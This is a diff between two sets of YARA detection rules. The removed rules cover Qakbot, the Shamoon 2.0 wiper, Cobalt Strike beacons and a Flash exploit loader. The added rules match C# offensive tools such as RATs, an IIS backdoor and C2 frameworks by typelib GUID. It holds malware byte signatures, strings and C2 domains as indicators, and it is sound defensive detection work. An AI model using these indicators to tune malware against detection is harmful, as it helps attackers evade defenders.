-		reference = "hxxps://www[.]krcert[.]or[.kr/data/secNoticeView.do?bulletin_writing_sequence=26998"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ole_loadswf_cve_2018_4878.yar#L2-L31"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ad8cf2c8-f70e-5f46-92fa-46e1fa5e683c"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/teeknofil/TheHackToolBoxTeek"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2079-L2105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "716cad0c5a12cc360522e2649c7870a493bef4bec3d55c3a3e235f3a85c02a56"
+		logic_hash = "08ffcdc2d2f7ae3325208dc4980b8f44505fc1fcf40a7a926ac5a0c97977a1d3"
 		score = 75
 		quality = 85
-		tags = "PURPORTED NORTH KOREAN ACTORS, CVE-2018-4878, FILE"
-		vuln_type = "Remote Code Execution"
-		vuln_impact = "Use-after-free"
-		affected_versions = "Adobe Flash 28.0.0.137 and earlier versions"
-		mitigation0 = "Implement Protected View for Office documents"
-		mitigation1 = "Disable Adobe Flash"
-		weaponization = "Embedded in Microsoft Office first payloads"
-		actor = "Purported North Korean actors"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$header = "rdf:RDF" wide ascii
-		$title = "Adobe Flex" wide ascii
-		$pdb = "F:\\work\\flash\\obfuscation\\loadswf\\src" wide ascii
-		$s0 = "URLRequest" wide ascii
-		$s1 = "URLLoader" wide ascii
-		$s2 = "loadswf" wide ascii
-		$s3 = "myUrlReqest" wide ascii
+		$typelibguid0lo = "2aa8c254-b3b3-469c-b0c9-dcbe1dd101c0" ascii wide
+		$typelibguid0up = "2AA8C254-B3B3-469C-B0C9-DCBE1DD101C0" ascii wide
+		$typelibguid1lo = "afeff505-14c1-4ecf-b714-abac4fbd48e7" ascii wide
+		$typelibguid1up = "AFEFF505-14C1-4ECF-B714-ABAC4FBD48E7" ascii wide
+		$typelibguid2lo = "4cf42167-a5cf-4b2d-85b4-8e764c08d6b3" ascii wide
+		$typelibguid2up = "4CF42167-A5CF-4B2D-85B4-8E764C08D6B3" ascii wide
+		$typelibguid3lo = "118a90b7-598a-4cfc-859e-8013c8b9339c" ascii wide
+		$typelibguid3up = "118A90B7-598A-4CFC-859E-8013C8B9339C" ascii wide
+		$typelibguid4lo = "3075dd9a-4283-4d38-a25e-9f9845e5adcb" ascii wide
+		$typelibguid4up = "3075DD9A-4283-4D38-A25E-9F9845E5ADCB" ascii wide
+		$typelibguid5lo = "295655e8-2348-4700-9ebc-aa57df54887e" ascii wide
+		$typelibguid5up = "295655E8-2348-4700-9EBC-AA57DF54887E" ascii wide
+		$typelibguid6lo = "74efe601-9a93-46c3-932e-b80ab6570e42" ascii wide
+		$typelibguid6up = "74EFE601-9A93-46C3-932E-B80AB6570E42" ascii wide
 
 	condition:
-		filesize < 500KB and all of ( $header* ) and all of ( $title* ) and 3 of ( $s* ) or all of ( $pdb* ) and all of ( $header* ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_Shellcode_Aug23
+rule SIGNATURE_BASE_HKTL_NET_GUID_Usbtrojan : FILE
 {
 	meta:
-		description = "Detects Qakbot Uninstaller files used by the FBI and Dutch National Police in a disruption operation against the Qakbot in August 2023"
-		author = "Florian Roth"
-		id = "860796ab-689f-5c5f-bc40-3e2ef7fd1d5d"
-		date = "2023-08-30"
-		modified = "2023-12-05"
-		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_qakbot_uninstaller.yar#L2-L14"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d25c9033-13e8-5fc9-8561-f8862cca39b8"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/mashed-potatoes/USBTrojan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2107-L2121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "91d26c50bf29517aa68e709ca3b6f32f4ca390f4c2f48e48cd251bfdd5dbcc71"
-		score = 60
+		logic_hash = "8435a9f9fdf1e29010db3f3c1f55c19d616761b0585a232686ed377a6a252297"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { E8 00 00 00 00 58 55 89 E5 89 C2 68 03 00 00 00 68 00 2C 00 00 05 20 0A 00 00 50 E8 05 00 00 00 83 C4 04 C9 C3 81 EC 08 01 00 00 53 55 56 57 6A 6B 58 6A 65 5B 6A 72 66 89 84 24 D4 00 00 00 33 }
+		$typelibguid0lo = "4eee900e-adc5-46a7-8d7d-873fd6aea83e" ascii wide
+		$typelibguid0up = "4EEE900E-ADC5-46A7-8D7D-873FD6AEA83E" ascii wide
 
 	condition:
-		$xc1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_FBI_Aug23
+rule SIGNATURE_BASE_HKTL_NET_GUID_IIS_Backdoor : FILE
 {
 	meta:
-		description = "Detects Qakbot uninstaller used by the FBI / Dutch Police"
-		author = "Florian Roth"
-		id = "499bff56-ff49-53df-9922-227b816c0a36"
-		date = "2023-08-31"
-		modified = "2023-12-05"
-		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_qakbot_uninstaller.yar#L16-L34"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "44264dd9-f8e9-5a60-847f-94378e07a327"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/WBGlIl/IIS_backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2123-L2139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0ce963190502709edec9434e6a64cb9db7c5553113b686afc56a516350d76baa"
-		score = 60
+		logic_hash = "fbf6c641c9cede86867a88b62d5287d918edd67ae9f7228b5243d050a6487345"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "559cae635f0d870652b9482ef436b31d4bb1a5a0f51750836f328d749291d0b6"
-		hash2 = "855eb5481f77dde5ad8fa6e9d953d4aebc280dddf9461144b16ed62817cc5071"
-		hash3 = "fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op1 = { 69 c1 65 89 07 6c 03 c2 89 84 95 24 f6 ff ff 8b 55 e4 42 89 55 e4 81 fa 70 02 00 00 7c d4 }
-		$op2 = { 42 89 55 e4 81 fa 70 02 00 00 7c d4 f2 0f 10 0d a0 31 00 10 33 f6 f2 0f 10 15 a8 31 00 10 66 90 }
-		$op5 = { 68 48 31 00 10 6a 28 57 e8 e4 fd ff ff 8b 4d fc 83 c4 4c 33 cd 33 c0 }
-		$op6 = { 33 c0 66 39 06 74 0f 0f 1f 80 00 00 00 00 40 66 83 3c 46 00 75 f8 8d 3c 00 }
+		$typelibguid0lo = "3fda4aa9-6fc1-473f-9048-7edc058c4f65" ascii wide
+		$typelibguid0up = "3FDA4AA9-6FC1-473F-9048-7EDC058C4F65" ascii wide
+		$typelibguid1lo = "73ca4159-5d13-4a27-8965-d50c41ab203c" ascii wide
+		$typelibguid1up = "73CA4159-5D13-4A27-8965-D50C41AB203C" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_SUSP_Adobepdf_SFX_Bitmap_Combo_Executable : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shellgen : FILE
 {
 	meta:
-		description = "Detects a suspicious executable that contains both a SFX icon and an Adobe PDF icon"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d2d078c9-fbe5-51f4-8f7e-5d943c5a8197"
-		date = "2020-11-02"
-		modified = "2023-12-05"
-		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_icon_anomalies.yar#L3-L37"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ac515d698507be6085684a6ec4622c6f3c26d0c3a0d94cbbeacfab7dfb9fe135"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
-
-	strings:
-		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
-               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
-               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
-               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
-               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
-               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
-               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
-               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
-               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
-               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
-               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
-               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
-		$sc2 = { 28 66 27 00 60 00 00 00 80 00 00 00 80 80 80 00
-               C0 C0 C0 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
-               FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
-               FF FF FF 00 FF FF FF 00 5D 33 00 00 5D 33 00 00
-               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00
-               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00 }
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "538a4f12-5020-5c76-9208-363f435ed9a9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/jasondrawdy/ShellGen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2141-L2155"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "ed7204d27cae6e0bcbe42247775e5eb20a968c5816f71135c7e2c92cc7fdffc5"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$typelibguid0lo = "c6894882-d29d-4ae1-aeb7-7d0a9b915013" ascii wide
+		$typelibguid0up = "C6894882-D29D-4AE1-AEB7-7D0A9B915013" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures < 1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_SUSP_Adobepdf_Bitmap_Executable : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Mass_RAT : FILE
 {
 	meta:
-		description = "Detects a suspicious executable that contains a Adobe PDF icon and no shows no sign of actual Adobe software"
-		author = "Florian Roth (Nextron Systems)"
-		id = "86ebadd4-64a8-5290-b45e-ac125a10ea66"
-		date = "2020-11-02"
-		modified = "2023-12-05"
-		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_icon_anomalies.yar#L39-L68"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "90b742da-6fd7-5c72-96cf-7a37a3e5d808"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Mass-RAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2157-L2175"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a8ef5ce2e876565c7d6367ce555d00bd3535699f1907f867811f2f6749672c67"
-		score = 60
+		logic_hash = "540620ade0225df3fa207052c3904584672eb5bdccaa523e28a1a2aced604ef9"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
-               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
-               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
-               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
-               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
-               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
-               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
-               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
-               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
-               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
-               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
-               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
-		$fp1 = "Adobe" ascii wide fullword
+		$typelibguid0lo = "6c43a753-9565-48b2-a372-4210bb1e0d75" ascii wide
+		$typelibguid0up = "6C43A753-9565-48B2-A372-4210BB1E0D75" ascii wide
+		$typelibguid1lo = "92ba2a7e-c198-4d43-929e-1cfe54b64d95" ascii wide
+		$typelibguid1up = "92BA2A7E-C198-4D43-929E-1CFE54B64D95" ascii wide
+		$typelibguid2lo = "4cb9bbee-fb92-44fa-a427-b7245befc2f3" ascii wide
+		$typelibguid2up = "4CB9BBEE-FB92-44FA-A427-B7245BEFC2F3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $sc1 and not 1 of ( $fp* ) and pe.number_of_signatures < 1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Shamoon2_Wiper : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Browser_Externalc2 : FILE
 {
 	meta:
-		description = "Detects Shamoon 2.0 Wiper Component"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6660a64c-daa4-59e6-aa65-55194cac600c"
-		date = "2016-12-01"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/jKIfGB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon2.yar#L10-L28"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8c309522-90e7-5f5a-b456-3a472756d397"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/mdsecactivebreach/Browser-ExternalC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2177-L2191"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "245b03d9606f2e391f53a60aa333c6b037aa1f013794d83b761813d54782b885"
-		score = 70
+		logic_hash = "d5121396444c406049fcb6c24680a067341943a6982f67c7c5cd11947d3468bc"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
-		hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
 
 	strings:
-		$a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
-		$x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
-		$s1 = "UFWYNYNTS" fullword wide
-		$s2 = "\\\\?\\ElRawDisk" fullword wide
+		$typelibguid0lo = "10a730cd-9517-42d5-b3e3-a2383515cca9" ascii wide
+		$typelibguid0up = "10A730CD-9517-42D5-B3E3-A2383515CCA9" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Shamoon2_Comcomp : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivepowershelltasking : FILE
 {
 	meta:
-		description = "Detects Shamoon 2.0 Communication Components"
-		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
-		id = "72068264-4f71-59fb-b3d8-938285ec8c7f"
-		date = "2016-12-01"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/jKIfGB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon2.yar#L30-L48"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d221e24d-a2ef-51e2-95bf-4b91b438d9cf"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/leechristensen/OffensivePowerShellTasking"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2193-L2209"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "edebdbcf17bd9fadc67c7d76839cf569f0ea20127d4e0d216411c35e9ba54208"
-		score = 70
+		logic_hash = "6de43b8349ff5f0e87d91e522be802a5dd18745441ffb76dcef63d2f1cd25332"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "mkdir %s%s > nul 2>&1" fullword ascii
-		$s2 = "p[%s%s%d.%s" fullword ascii
-		$op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 }
-		$op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d }
-		$op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c }
+		$typelibguid0lo = "d432c332-3b48-4d06-bedb-462e264e6688" ascii wide
+		$typelibguid0up = "D432C332-3B48-4D06-BEDB-462E264E6688" ascii wide
+		$typelibguid1lo = "5796276f-1c7a-4d7b-a089-550a8c19d0e8" ascii wide
+		$typelibguid1up = "5796276F-1C7A-4D7B-A089-550A8C19D0E8" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( all of ( $s* ) or all of ( $op* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Eldos_Rawdisk : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dohc2 : FILE
 {
 	meta:
-		description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
-		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
-		id = "8a43f425-86b7-5a05-b7c3-13c78aa905f8"
-		date = "2016-12-01"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/jKIfGB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon2.yar#L50-L75"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0bb38f10-ca5c-5c18-97c9-540b6367d150"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/SpiderLabs/DoHC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2211-L2225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab09371b91ab6889f342c7992108ad374b5ecf67b6c2144a6282670f177d0f15"
-		score = 50
+		logic_hash = "d94760229bd6df29f7e281ee9d38068699d6529b93ed90c8846635bd496d602a"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
-		hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "g\\system32\\" wide
-		$s2 = "ztvttw" fullword wide
-		$s3 = "lwizvm" fullword ascii
-		$s4 = "FEJIKC" fullword ascii
-		$s5 = "INZQND" fullword ascii
-		$s6 = "IUTLOM" fullword wide
-		$s7 = "DKFKCK" fullword ascii
-		$op1 = { 94 35 77 73 03 40 eb e9 }
-		$op2 = { 80 7c 41 01 00 74 0a 3d }
-		$op3 = { 74 0a 3d 00 94 35 77 }
+		$typelibguid0lo = "9877a948-2142-4094-98de-e0fbb1bc4062" ascii wide
+		$typelibguid0up = "9877A948-2142-4094-98DE-E0FBB1BC4062" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_Resources_Beacon_Dll_V3_8_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Syscallpoc : FILE
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.8"
-		author = "gssincla@google.com"
-		id = "6c65cbf8-2c60-5315-b3b2-48dfcee75733"
-		date = "2022-11-18"
-		modified = "2023-12-05"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gcti_cobaltstrike.yar#L1020-L1061"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1ed5e226-0dcd-5397-b5e8-41f8a14981a1"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/SolomonSklash/SyscallPOC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2227-L2243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603"
-		logic_hash = "cde078a6ae7d0d835900e85498cf5ae20663ba8d5d3f912810e157261561e16a"
+		logic_hash = "95f6c80e810c4f3b680958d8fe41983f965e47994ddc2f85756d570341b54bb9"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
-		$xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go"
-		$c2_1 = "ns7.softline.top" xor
-		$c2_2 = "ns8.softline.top" xor
-		$c2_3 = "ns9.softline.top" xor
+		$typelibguid0lo = "1e54637b-c887-42a9-af6a-b4bd4e28cda9" ascii wide
+		$typelibguid0up = "1E54637B-C887-42A9-AF6A-B4BD4E28CDA9" ascii wide
+		$typelibguid1lo = "198d5599-d9fc-4a74-87f4-5077318232ad" ascii wide
+		$typelibguid1up = "198D5599-D9FC-4A74-87F4-5077318232AD" ascii wide
 
 	condition:
-		$version_sig and $decoder and ( 2 of ( $c2_* ) or $xmrig_srcpath )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Two_Byte_XOR_PE_And_MZ : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Pen_Test_Tools : FILE
 {
 	meta:
-		description = "Look for 2 byte xor of a PE starting at offset 0"
-		author = "Wesley Shields <wxs@atarininja.org>"
-		id = "ddb87194-bafb-597d-9184-fe4fe3c5ce8d"
-		date = "2021-10-11"
-		modified = "2023-12-05"
-		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xored_pe.yar#L2-L13"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "00fb98a9-e615-5fb6-a555-4326b93e2c24"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/awillard1/Pen-Test-Tools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2245-L2281"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8a43ff9ec966df72ef35fb9ba9bbbd6f8b0f3761669bb91dc5919645d6327174"
-		score = 70
-		quality = 85
+		logic_hash = "413cef91cab63cec432cb8deb2876f0370f6fe8b5e194b513bc905aca755e732"
+		score = 50
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$typelibguid0lo = "922e7fdc-33bf-48de-bc26-a81f85462115" ascii wide
+		$typelibguid0up = "922E7FDC-33BF-48DE-BC26-A81F85462115" ascii wide
+		$typelibguid1lo = "ad5205dd-174d-4332-96d9-98b076d6fd82" ascii wide
+		$typelibguid1up = "AD5205DD-174D-4332-96D9-98B076D6FD82" ascii wide
+		$typelibguid2lo = "b67e7550-f00e-48b3-ab9b-4332b1254a86" ascii wide
+		$typelibguid2up = "B67E7550-F00E-48B3-AB9B-4332B1254A86" ascii wide
+		$typelibguid3lo = "5e95120e-b002-4495-90a1-cd3aab2a24dd" ascii wide
+		$typelibguid3up = "5E95120E-B002-4495-90A1-CD3AAB2A24DD" ascii wide
+		$typelibguid4lo = "295017f2-dc31-4a87-863d-0b9956c2b55a" ascii wide
+		$typelibguid4up = "295017F2-DC31-4A87-863D-0B9956C2B55A" ascii wide
+		$typelibguid5lo = "abbaa2f7-1452-43a6-b98e-10b2c8c2ba46" ascii wide
+		$typelibguid5up = "ABBAA2F7-1452-43A6-B98E-10B2C8C2BA46" ascii wide
+		$typelibguid6lo = "a4043d4c-167b-4326-8be4-018089650382" ascii wide
+		$typelibguid6up = "A4043D4C-167B-4326-8BE4-018089650382" ascii wide
+		$typelibguid7lo = "51abfd75-b179-496e-86db-62ee2a8de90d" ascii wide
+		$typelibguid7up = "51ABFD75-B179-496E-86DB-62EE2A8DE90D" ascii wide
+		$typelibguid8lo = "a06da7f8-f87e-4065-81d8-abc33cb547f8" ascii wide
+		$typelibguid8up = "A06DA7F8-F87E-4065-81D8-ABC33CB547F8" ascii wide
+		$typelibguid9lo = "ee510712-0413-49a1-b08b-1f0b0b33d6ef" ascii wide
